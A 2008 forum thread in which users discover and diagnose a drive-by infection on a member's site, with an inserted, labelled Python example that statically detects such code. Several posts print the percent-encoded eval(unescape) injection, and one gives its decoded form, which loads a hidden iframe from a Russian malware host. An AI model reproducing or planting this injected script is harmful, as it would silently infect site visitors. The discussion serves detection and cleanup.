Cable Forum


CaptJamieHunter 29-04-2008 16:30

Re: Virgin Media Phorm Webwise Adverts [Updated: See Post No. 1, 77, 102 & 797]
 
Support request opened. Seems the FTP and web front end aren't responding so there could be an issue there. Once the access issue is sorted the page will be reloaded onto the ftp server.

hOrZa 29-04-2008 16:31

Re: Virgin Media Phorm Webwise Adverts [Updated: See Post No. 1, 77, 102 & 797]
 
maybe the Russians know more about the word phorm than we do lol

vicz 29-04-2008 16:36

Re: Virgin Media Phorm Webwise Adverts [Updated: See Post No. 1, 77, 102 & 797]
 
There is a strange script appended to the page source "<script redacted >eval(unescape("%77%69%6e%64%6f%77%2e%73%74%61%74% 75%73%3d%27%44%6f%6e%65%27%3b%64%6f%63%75%6d%65%6e %74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%2 0%6e%61%6d%65%3d%31%63%61%37%65%66%63%34%61%31%20% 73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%74%72%61%66 %66%75%72%6c%2e%72%75%2f%73%6c%69%76%3f%27%2b%4d%6 1%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61% 6e%64%6f%6d%28%29%2a%32%31%35%38%37%37%29%2b%27%37 %31%5c%27%20%77%69%64%74%68%3d%36%38%31%20%68%65%6 9%67%68%74%3d%33%31%37%20%73%74%79%6c%65%3d%5c%27% 64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c %2f%69%66%72%61%6d%65%3e%27%29")); </script> " (the Redacted is my comment!)

Maybe the site has suffered from a drive by server attack http://www.theregister.co.uk/2008/04..._attack_grows/

Deko 29-04-2008 16:38

Re: Virgin Media Phorm Webwise Adverts [Updated: See Post No. 1, 77, 102 & 797]
 
Guys.

It looks like there is some escaped code at the bottom of the page.

This is the unescaped script:

Quote:

window.status='Done';document.write('<iframe name=1ca7efc4a1 src=\'http://traffurl.ru/sliv?'+Math.round(Math.random()*215877)+'71\' width=681 height=317 style=\'display: none\'></iframe>')
original code.

Quote:

<script>eval(unescape("%77%69%6e%64%6f%77%2e%73%74 %61%74%75%73%3d%27%44%6f%6e%65%27%3b%64%6f%63%75%6 d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61% 6d%65%20%6e%61%6d%65%3d%31%63%61%37%65%66%63%34%61 %31%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%74%7 2%61%66%66%75%72%6c%2e%72%75%2f%73%6c%69%76%3f%27% 2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e %72%61%6e%64%6f%6d%28%29%2a%32%31%35%38%37%37%29%2 b%27%37%31%5c%27%20%77%69%64%74%68%3d%36%38%31%20% 68%65%69%67%68%74%3d%33%31%37%20%73%74%79%6c%65%3d %5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%2 7%3e%3c%2f%69%66%72%61%6d%65%3e%27%29")); </script>

But it is also trying to run the "Microsoft Data Access - Remote Data Services" control.


So maybe that site is trying to load some nasties.
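
Added example (not part of any post in this thread): a static check for the pattern discussed above, which decodes `eval(unescape("..."))` bodies without executing them and reports hidden off-site iframes. The sample page, the host names (`injected.example.invalid`, `www.example.org`) and the function names are constructed for illustration.

```python
import re
from urllib.parse import unquote, urlparse

# Matches eval(unescape("...")); the body is captured and decoded, never executed.
WRAPPER = re.compile(r'eval\s*\(\s*unescape\s*\(\s*(["\'])(.*?)\1\s*\)\s*\)', re.I | re.S)
IFRAME = re.compile(r'<iframe\b[^>]*>', re.I)
SRC = re.compile(r'''src\s*=\s*\\?["']?([^\s"'\\>]+)''', re.I)
HIDDEN = re.compile(r'display\s*:\s*none|visibility\s*:\s*hidden', re.I)


def decode_wrappers(html):
    """Return the decoded body of every eval(unescape("...")) call in html."""
    decoded = []
    for match in WRAPPER.finditer(html):
        # Assumes a fully %xx-encoded body, so any whitespace is wrapping damage.
        blob = re.sub(r'\s+', '', match.group(2))
        # JavaScript unescape() maps %xx to Latin-1; %uXXXX is not handled here.
        decoded.append(unquote(blob, encoding='latin-1'))
    return decoded


def scan(html, page_host):
    """Report each iframe written by a decoded wrapper: host, hidden, off-site."""
    findings = []
    for script in decode_wrappers(html):
        for tag in IFRAME.findall(script):
            src = SRC.search(tag)
            host = urlparse(src.group(1)).hostname if src else None
            findings.append({
                'src_host': host,
                'hidden': bool(HIDDEN.search(tag)),
                'off_site': host is not None and host != page_host.lower(),
            })
    return findings


# Constructed sample: same shape as the decoded script quoted above, placeholder host.
SAMPLE_JS = ("window.status='Done';document.write('<iframe name=demo "
             "src=\\'http://injected.example.invalid/p?'+Math.round(Math.random()*1000)+"
             "'1\\' width=681 height=317 style=\\'display: none\\'></iframe>')")
ENCODED = ''.join('%%%02x' % byte for byte in SAMPLE_JS.encode('latin-1'))
# Insert spaces every 50 characters to mimic the wrapped paste in the posts.
WRAPPED = ' '.join(ENCODED[i:i + 50] for i in range(0, len(ENCODED), 50))
SAMPLE_HTML = ('<html><body><p>hit counter</p><script>eval(unescape("'
               + WRAPPED + '"));</script></body></html>')

if __name__ == '__main__':
    for finding in scan(SAMPLE_HTML, 'www.example.org'):
        print(finding)
```

Run against saved page source, any finding with both `hidden` and `off_site` set is worth treating as an injected frame until the file on the server has been checked.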

vicz 29-04-2008 16:45

Re: Virgin Media Phorm Webwise Adverts [Updated: See Post No. 1, 77, 102 & 797]
 
My Safari Activity Window shows this link "traffurl.ru/sliv/?5776271". Googling the domain gets a 'This site may harm your computer' message. So looks like Kaspersky is correct.

Pasanonic 29-04-2008 16:46

Re: Virgin Media Phorm Webwise Adverts [Updated: See Post No. 1, 77, 102 & 797]
 
With regard to the captain's video site I am seeing no problems with Norton or Spybot resident. However there are two concerning frames appearing when I check it out with Adblock.

http://traffurl.ru/sliv?4193771

This is one, but the other (also linked to an index.php at the Russian URL) seems to have disappeared as I've just done a system restart.

Edit. The offending article seems to be your hit counter

vicz 29-04-2008 16:47

Re: Virgin Media Phorm Webwise Adverts [Updated: See Post No. 1, 77, 102 & 797]
 
I mean we all know .ru is Russia right? I mean it's not just me being paranoid....

jelv 29-04-2008 16:49

Re: Virgin Media Phorm Webwise Adverts [Updated: See Post No. 1, 77, 102 & 797]
 
Kent's friends starting a counter attack on anti-Phorm sites?

Chroma 29-04-2008 16:51

Re: Virgin Media Phorm Webwise Adverts [Updated: See Post No. 1, 77, 102 & 797]
 
Quote:

Originally Posted by jelv (Post 34541106)
Kent's friends starting a counter attack on anti-Phorm sites?

counter attack suggests we attacked first

Paddy1 29-04-2008 16:52

Re: Virgin Media Phorm Webwise Adverts [Updated: See Post No. 1, 77, 102 & 797]
 
When I refreshed this (forum) page just now AVG came up with a threat alert saying virus HTML/framer detected. It couldn't "heal" the page and I could only vault it. I'm posting this from another pc.

Ravenheart 29-04-2008 16:52

Re: Virgin Media Phorm Webwise Adverts [Updated: See Post No. 1, 77, 102 & 797]
 
Adblock and NoScript are blocking the links to

http://traffurl.ru/sliv?19907971



Hmm, tis suspicious

Pasanonic 29-04-2008 16:55

Re: Virgin Media Phorm Webwise Adverts [Updated: See Post No. 1, 77, 102 & 797]
 
Quote:

Originally Posted by Ravenheart (Post 34541111)
Adblock and NoScript are blocking the links to

http://traffurl.ru/sliv?19907971



Hmm, tis suspicious


This discussion might add some more information.

http://www.developersdex.com/asp/mes...2978&r=6157380

CaptJamieHunter 29-04-2008 16:56

Re: Virgin Media Phorm Webwise Adverts [Updated: See Post No. 1, 77, 102 & 797]
 
The code for the hit counter doesn't have anything to do with .ru domains - just a cgi script passing display parameters. No .ru anywhere.

The call has been updated and as soon as the response says access is available then it will be sorted.

Pasanonic 29-04-2008 16:59

Re: Virgin Media Phorm Webwise Adverts [Updated: See Post No. 1, 77, 102 & 797]
 
Quote:

Originally Posted by CaptJamieHunter (Post 34541115)
The code for the hit counter doesn't have anything to do with .ru domains - just a cgi script passing display parameters. No .ru anywhere.

The call has been updated and as soon as the response says access is available then it will be sorted.

Sorry, you are correct. The reason I thought it was that is because I asked Adblock to flash the offending frame and it appeared around your hit counter. It would appear an invisible frame is being used to upload a trojan from the Russian server.
At least you should remove the script from the page.

CaptJamieHunter 29-04-2008 17:01

Re: Virgin Media Phorm Webwise Adverts [Updated: See Post No. 1, 77, 102 & 797]
 
Quote:

Originally Posted by Pasanonic (Post 34541116)
Sorry, you are correct. The reason I thought it was that is because I asked Adblock to flash the offending frame and it appeared around your hit counter. It would appear an invisible frame is being used to upload a trojan from the Russian server.
At least you should remove the script from the page.

When I can get to it I will.

